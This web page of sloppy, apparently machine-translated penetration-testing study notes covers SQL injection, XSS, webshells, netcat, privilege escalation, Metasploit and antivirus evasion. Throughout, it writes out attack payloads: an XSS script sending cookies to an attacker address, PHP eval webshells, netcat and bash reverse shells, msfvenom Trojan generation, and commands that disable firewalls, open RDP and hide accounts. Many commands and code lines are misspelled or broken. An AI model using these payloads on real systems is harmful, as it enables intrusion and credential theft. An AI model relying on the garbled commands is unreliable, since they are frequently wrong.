The Road to Network Security: My Systematic Penetration Testing Learning Framework

Category: Tag:

Note: The following content only records the relevant knowledge that I did not know when I was studying. The notes are sloppy and may be wrong, for reference only. I will gradually improve it!

Basically complete penetration testing framework



Mv modify file name

The http request contains:

Request line

Request header

Request body

Get request has no request body


1. Request parameters


501 Method not implemented

3xx redirect

Sql injection:

1. Judge’or”

2. Comment: # or–

Joint query:

1.Order by

2.union select 1,2

3. Library database()

4. Table information_schema.tables

5. Column union select column_name, 2 from information_schema.columns where table_schema=database() and able_name=’users’#

6.Content union select user,password from users#

And ascii(mid((select user from user 0,1),1,1))>96

Boolean injection (violent injection):

And 1=1

And 1=2


Table exists(select * form users)

Column exists (select column name form users)

Content and select user from users limit 1,2 / select mid(“hello word”,2,1) take one from the second line

0-9: 48 0x30

a-z: 97 0x61 select ascii(‘A’)

select ascii(‘A’)

A-Z 65 0x65

URL encoding: start with %, %20 is a space

Sleep() delay usage Select if(exist(select * frrom user),sleep(5),3)


3, 5, 9 questions

Docker pull

Docker run


comcat(“hell”,”word!”) splicing

Select ord(‘:’) view accii

Hex(68) Check hexadecimal

Group_concat(username,0x3a,password) one line display

-Error injection:


Select floor((rand(0)*2)

Rand(0) random number

-updatexml(1,comcat(0x7e,version(),0x7e),3) version() can be replaced with sql statement

-extractvalue in the same way

-Second order injection:

-insert into users claus(‘admin’,’pwd’)

-update usersset pwd=’123′ where name=’name’

-Universal password

-File reading and writing





-Read files

-load_file (‘path’) absolute path

Etc/passwd stores user information

-Write file

-into outfile’path’

-into dumpfile’path’

-Bypass technology

-Replace or=|| and =&&


-Double writing. To combat this, you can use a loop to continue filtering until there is no

-Inline comments

-Space %20+ — ,)), %a0 %0b –=ss %2b

-Comment # +–+ —-> Close is to close the following



-Basic use

1.judgment Sqlmap -u “url”
2.library sqlmap -u “url” –dbs /–current-db
3.table sqlmap -u “url” -D db –tables
4.Column sqlmap -u “url” -D db -T tb –columns
5.content sqlmap -u “url” -D db -T tb -C col –dump
For post type Sqlmap -r 1.txt
Sqlmap -r 1.txt -vv -D security                                     –v Show detailed information, including what was entered

-Write tamper

-Command execution

-Multiple command symbols

|| (or) can be executed later when the front is false


&& One&

Background process



-File contains


-PHP include() require() –db

Example: http://localhost:8001/vulnerabilities/fi/?page=../../../../../etc/passwd


-No matter what the suffix is, as long as there is php code in it, it will be executed

-php pseudo protocol






-http://localhost:8001/vulnerabilities/fi/?page= remote file contains

-XSS (html injection)

-js statement

-document.cookie to get cookie

-Storage type

<script>document.location=’http://your address’+document.cookie</script>


document.write(“img src=’http://”+document.cookie+”‘/>”);


-File upload (capture package, send reper, modify suffix)

-A sentence

<?php @eval($_post[1]);?>


<?php $_get[0]($_post[1]);?> When connecting, add 0=access after the link

Client tools:

Ant Sword

Principle; 1=@eval(base_decode($_POST[2]));$2=system(‘ls …/’);

-an examination

-Client js detection


-Capitalization php3,,php4,php5 ,phtml



Content: AddType application/x-httpd-php gif Meaning: parse the gif file according to php

-Types of


-image/png These are the contentType attributes


-File header

-GIF89a gif file header

-document content

<?php $_GET[0]($_post[1]);?> ?0=assert

Day 6


-beef software

-Blue Lotus

-File contains


-File Upload

-00 truncated


-hashcat -a 0 -m 0 md5.hash dictionary path



chown belongs to group Eg: chown www-data upload

chgrp reorganization

Reboot shutdown -r now restart

Init 0 shutdown


-jwt json format web token

-HS256 is HMAC-SHA256

Hashcat -a 0 -m 1450 (Sash id) hash file dictionary path

def hmac_base63(key,message): return base63.urlsafe_b64encode(bytes.fromhex(,message,hashlib.sha256).hexdigest()))


-OWASP top 10

-Leakage of sensitive information



-Unsafe deserialization



Echo serialize($aaa);



Book: “OWASP Testing Guide”

“Hacker Attack and Defense Technology Collection-Web Actual Combat”

website: vulnerability test range






Software website:



Safety products:

-Gateway: EW, ZPS, FS

-Terminal category: AV, patch, NAC network access control, EDR, DLP

-Audit category: log audit, database audit, VPN, fortress machine

-Monitoring category: APT, SOC, honeypot

Day 11:

-Wait for guarantee


-php7 Trojan implementation

-A sentence

-poc proof of concept


-Link layer CRC

-Network layer: packet, only header

-DNS resolution uses udp, server and server use tcp

-vi command

-x delete the current character

-dd delete the current line

-comm -1 1.txt 2.txt Find the same and different

-diff 1.txt 2.txt find the difference

-diff -c 1.txt 2.txt View all the information -u, after deduplication, display together

-vimdiff 1.txt 2.txt

-ps view process

-tail 1.txt

-tail -f 1.txt monitors the growth behind the file. Vim does not seem to work.

-watch -n 5 monitor -n is a few seconds to refresh

-watch -n 5 w monitor w command

-wget download file

-curl -o download file

-Environmental preparation




-ubuntu 14/metasploit2


-Swiss knife netcat

-nc -lvp 3333 open a port

-nc -l localhost 4444 link port

-n does not display nds parsing information

-v show detailed information

-e followed by the command

-file transfer

-Recipient nc -lvp 4444> 1.txt

-Sender nc ip/domain name port <1.txt

-Bind shell

-Server nc -lvo 444 -e cmd.exe

-Attacker nc -nv ip port -e cmd.exe

-Reverse shell


-nc -lvp 444


-nc -nv ip port -e cmd.exe


-collect message





-nmap -p- -Pn -n ip

-nmap -p 21 -sV -Pn -n –script==xx ip

-Nmap -O ip

-Nmap -A -F ip

-nmap -Pn -n –script=ftp-vsftpd-backdoor

-vuln scan

-debian6 amd64 .deb sudo install ./nessusxxxx.deb sudo service nessusd start

-web scan


-IBM appscan

-hp webinspect


-xary webscan –listen 7777 –html-output 1.html

-Combined with bp

-Set connections under user options

-destination host:ip

-proxy host:

-proxy port:7777


-whois registration information

-Webmaster’s Home


-google hacking

  • -site:
  • -filetype:File type Preceded with-sign means not to look at this type
  • -inurl:
  • -error:What errors have been reported
  • -GHDB


-Password cracking


-Generate (Social Engineering Dictionary)

-cewl cewl -d 2 -m 6 -w ./1.txt

Sudo apt install crowbar

Online cracking (remote): medusa hydra

Network service (db, ftp, ssh, rdp)


Http basic

Offline cracking (local) hash– which kind of hash the hashid command identifies



-hash is: NT/NTLM

-Tools pwdump7/samdump2




-hash512 is doing encryption

-rainbow rainbow table address:

-In memory-plaintext





-other hash


-Implementation process

Communicate with technical dockers

-Default port number (global port) range 0-1035

Firewall/ips/icg configuration mode

-Bridge mode (transparent mode)

-In-generation management

-External management

-Routing mode (not commonly used)

-Bypass mode


-ICG management method


-Console baud rate is 9600 icgadmin/netentsec


-The default management address of the firewall:


From <>

Policy routing priority

-Host routing -> Direct routing -> Static routing (including dynamic routing) -> Policy routing -> ISP routing -> Default routing


-Vulnerability analysis/exploitation

-Application layer: web

-Universal owasp top10

-CMS: wordpress/discuz/joomla

-Development Framework

-php: thinkphp

-java: SSM

-Python: Flask/Django

-General framework: es

-Middleware: tomcat/weblogic

CVE/exploit-db this is a website/searchsploit


-Relational: mysql, msssql, oracle

-Non-relational: redis/mongodb

-operating system




-Dirty cow (dirtycow)

-Network layer:

Variables start with $

Fuzz fuzz test




who am I

Not absolutely safe

Github: list

Kali restart network command

Sudo systemctl restart networking

Sudo systemctf restart NetworkManager



The default account password for all QiAnXin products:


Write a sentence under linux, pay attention to escape

Low authority:

Right escalation:


-Exploit OS vulnerabilities


-third-party usage


-.php perl language

-.rb ruby ​​language is generally used for msf

-.c run after gcc is compiled

-Vulnerabilities in .txt/.md webapps

-Scan the background

-dirb tool

Linux permissions

-rw-r–r– 1 This number is for directories, all directories have two subdirectories,. and ..

10 people

User group other

-: ordinary file

d: directory

l: link (shortcut)

b/c: device file

-rws r-x r-x where s means that other users execute the file with the permissions of the file owner

The octal representation is 4755, the other is displayed as t, which means tmp temporary file

There are many rights escalations on github on linux and windows

In the Passwd file:

root:x:0:0:root:/root:/bin/bash x One digit means a placeholder for the password, if not, it means no password

In the shadow file:

root:!:18470:0:99999:7:::! Indicates that you cannot log in, cannot log in, or is locked. 18470 indicates the number of days subtracted from January 1, 1970, which is the time when the password was last modified

linux firewall




View os information:



Users added under the Etc/sudoer.d file can use sudo

Find files with s permissions Sudo find / -perm -4000 2>/dec/null

touch create file

Echo “`Command`” Backquote means to execute as a command


-Windows basics

Help document command/?

-system message





-Computer management: compmgmt.msc

-SAM is essentially the registry-the command is: regedit

The group policy command is: gpedit.msc


administrator 500

Guest 501

Net user View user

Net user username password change password

Net user username /active:yes activate account

See the help document for others

Add $ to the end of the username to hide the account

Net localgroup administrators view this group


Turn off firewall

-net stop shareacce

-netsh firewall set opmode disable

-netsh advfirewall set allprofile state off

-Open 3389

Reg add “HKLM\system\currentcontrolset\control\terminal server” /v fDenyTSConnections /t reg_dword /d 0 /f

-View port

-reg query “HKLM\system\currentcontrolset\control\terminal server\winstation\rdp-tcp” /v portnumber

After Msfvenom generates the Trojan, enter the msfconsole and use the following command: Use exploit/multi/handler

-Change environment variable command


Su tom switch user


-gobuster tool

nmap escalation

git escalation

awk escalation

msf monitor exploit/mu msfvenom generation: msfevom -p payload lhost=ip -f exe -a x64 -o shell.exe



-linux turn off the firewall

-service iptables stop


-bash -I >& /dev//tcp/ip/port 0>&1


-Port forwarding

-msf can do

rdesktop tool command: rdesktop ip

The first step is to generate a rebound exe through msfv and pass it to the other party

The second part, msfc turns on monitoring, and the other party runs exe

The third step, after the link, execute the remote desktop port forwarding command

The fourth part. Link your own 3389, use rdesktop command

VM Network



-host only

Linux default proxy /etc/proxychains

Nmap scan is best to add -Pn (prohibit ping scan) for protocol reasons, such as


Msf – post

Cobalt strike – red team



Ice scorpion West thorn agent (free agent exchange ip)

Kerbors authentication in windows domain name–golden ticket–SSO

-tgt ticket license ticket

The privilege escalation module is often used in the msf domain, search psexec


file transfer




Put and get


Echo $webclient = New-Object System.Net.WebClient >> open a web client under wget.psl windows

Echo $url = “http://192,.168.174.128:4444/hello.txt”>>wget.psl file address under kali

Echo $file=”exploid.txt” >> The name of the file saved in wget.psl under windows

Echo $webclient.DownloadFile($url,$file) >>wget.psl download file

The premise of the following execution is to open a web service under kali

Powershell.exe -ExecutionPolicy Bypass -Nologo -Nonlnteractive -Nologo -noninteractive -noprofile -file file name or

Powershell.exe -ExecutionPolocy Bypass -File filename

Powershell.exe (new-object

Anti-software bypass

-Signature bypass







-Sandbox-Behavior-Monitor files/registries/network connections

Shellter tool, inject code into normal PE files, such as notepad.exe, and it must be a 32-bit program

Empire tool, similar to msf, written in powershell, mostly powershell modules

Permission maintenance




-Image hijacking

-Remote Control Trojan




Clean up traces

Metasploit3 drone penetration

The binwalk command separates whether the image is multiple files

Knock ip port

View Knockd.conf can use knock technology

View file attributes command under windows


Encryption under windows has EFS and

Bitlocker (encrypt hard disk)

icacls under windows is the command to change permissions

View file attributes under lsattr under linux

Intranet penetration agent cannot use vpn or frp

To be continued………….


There are no reviews yet.

Be the first to review “The Road to Network Security: My Systematic Penetration Testing Learning Framework”

Your email address will not be published. Required fields are marked *